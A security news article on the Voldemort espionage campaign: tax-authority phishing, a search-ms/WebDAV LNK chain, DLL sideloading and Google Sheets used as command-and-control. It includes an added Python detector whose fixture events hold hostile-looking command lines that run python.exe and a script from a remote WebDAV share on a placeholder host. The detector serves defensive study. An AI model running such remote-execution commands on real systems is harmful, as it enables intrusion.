
Espionage Alert: Google Sheets Exploit For Malware Control

Wajahat Raja

September 13, 2024 - TuxCare expert team

A Google Sheets exploit has recently been discovered by security researchers at Proofpoint. According to the initial reporting, the platform is being abused as a command-and-control (C2) channel. In this article, we’ll look at what the Google Sheets exploit involves, which sectors are being targeted, and more. Let’s begin!

Google Sheets Exploit: Initial Discovery

Proofpoint first detected the Google Sheets exploit activity on August 5th, 2024. The threat actors behind the cyber espionage malware are impersonating tax authorities from several governments; the impersonated bodies include those of the United States (US) and other countries in Asia and Europe.

So far, the Google Sheets exploit attacks have targeted 70 organizations worldwide. The threat actors are using a tool called Voldemort, which can gather information and deliver additional payloads. The sectors targeted to date include:

  • Insurance
  • Aerospace
  • Transportation
  • Academia
  • Finance
  • Technology
  • Industrial
  • Healthcare
  • Automotive
  • Hospitality
  • Energy
  • Government
  • Media
  • Manufacturing
  • Telecom
  • Social benefit organizations

It’s worth mentioning that 20,000 email messages have already been sent as part of the attack; the campaign has not been attributed to any specific threat actor.

Tax Authority Impersonation Scam

The 20,000 emails falsely claim to come from tax authorities in the US, the United Kingdom (UK), Germany, France, Italy, India, and Japan. They inform recipients of a “change” in their tax filing and urge them to click on Google AMP Cache URLs.

These URLs lead to a page that inspects the User-Agent string to determine whether the visitor is running Windows. If so, the search-ms: URI protocol handler is used to display a Windows shortcut (LNK) file hosted on an attacker-controlled WebDAV share; the shortcut is disguised as a PDF so that the user is tricked into launching it.

Providing further details, Proofpoint researchers Tommy Madjar, Pim Trouerbach, and Selena Larson have stated that:

“If the LNK is executed, it will invoke PowerShell to run Python.exe from a third WebDAV share on the same tunnel (\library\), passing a Python script on a fourth share (\resource\) on the same host as an argument. This causes Python to run the script without downloading any files to the computer, with dependencies being loaded directly from the WebDAV share.”

The Python script collects system information and sends it, as a Base64-encoded string, to a domain controlled by the threat actor. The victim is then shown a decoy PDF while a password-protected ZIP file is downloaded to the system.
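The quoted chain (LNK invokes PowerShell, which runs python.exe from one WebDAV share and passes a script on a second share as its argument) leaves a distinctive process-creation footprint. The following is an added detection example, not Proofpoint's or TuxCare's code; the events, host 203.0.113.10 and file names are constructed placeholders, and only the share names \library\ and \resource\ come from the article.

```python
import re
from typing import Dict, List

# Constructed process-creation events (not real telemetry) modelled on the chain above.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -w hidden \\203.0.113.10@SSL\DavWWWRoot\library\python.exe "
                r"\\203.0.113.10@SSL\DavWWWRoot\resource\stage.py"},
    {"parent": "powershell.exe", "image": "python.exe",
     "cmdline": r"\\203.0.113.10\library\python.exe \\203.0.113.10\resource\stage.py"},
    {"parent": "explorer.exe", "image": "python.exe",            # benign local build
     "cmdline": r"C:\Python312\python.exe C:\Users\alice\build.py"},
    {"parent": "cmd.exe", "image": "powershell.exe",             # benign local script
     "cmdline": r"powershell.exe -File C:\scripts\backup.ps1"},
]

# A UNC path (\\host\... or the WebDAV forms \\host@SSL\DavWWWRoot\...) ending in python.exe.
PY_FROM_UNC = re.compile(r"\\\\[\w.\-]+(?:@(?:SSL|\d+))?(?:\\[^\s\\]+)*\\python\.exe", re.I)
# A .py argument that also lives on a UNC path (the script never touches local disk).
SCRIPT_FROM_UNC = re.compile(r"\\\\[\w.\-]+(?:@(?:SSL|\d+))?(?:\\[^\s\\]+)*\.py\b", re.I)


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons (possibly none) why one process-creation event looks like this chain."""
    cmd, reasons = event["cmdline"], []
    if PY_FROM_UNC.search(cmd):
        reasons.append("python.exe launched from a remote (UNC/WebDAV) share")
    if SCRIPT_FROM_UNC.search(cmd):
        reasons.append("script argument read from a remote share")
    # Parent chain alone is weak evidence; it only raises severity when combined with a remote path.
    if event["image"].lower() == "python.exe" and event["parent"].lower() == "powershell.exe":
        reasons.append("powershell.exe -> python.exe parent chain")
    return reasons


def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Score each event: 'high' = remote interpreter and remote script, 'medium' = one, 'low' = chain only."""
    findings = []
    for idx, ev in enumerate(events):
        reasons = classify(ev)
        if not reasons:
            continue
        remote = bool(PY_FROM_UNC.search(ev["cmdline"])) + bool(SCRIPT_FROM_UNC.search(ev["cmdline"]))
        severity = {2: "high", 1: "medium", 0: "low"}[remote]
        findings.append({"index": idx, "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The same patterns map directly onto Sysmon Event ID 1 or EDR process telemetry fields (ParentImage, Image, CommandLine).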

The ZIP file contains “CiscoCollabHost.exe,” an executable vulnerable to DLL sideloading, and a malicious DLL named “CiscoSparkLauncher.dll.” Voldemort, the tool used to carry out the attack, is written in C and uses Google Sheets for several purposes, including:

  • C2
  • Data exfiltration
  • Executing commands from the operators

The campaign has been described as unusual, and the threat actors are expected to narrow their focus to a small group of targets. The delivery approach used in the Google Sheets exploit has also been seen in other malware families used for initial access, including Latrodectus, DarkGate, and XWorm.

Conclusion

The Google Sheets exploit marks a notable evolution in cyber espionage tactics: a trusted platform is repurposed as the malware’s control channel, which blends its traffic in with legitimate use. With multiple sectors targeted and a high level of deception involved, it highlights the need for heightened cybersecurity measures, vigilance, and ongoing awareness. Such measures can lower the risk of exposure and help protect against advanced threats.

The sources for this piece include articles in The Hacker News and Bleeping Computer.
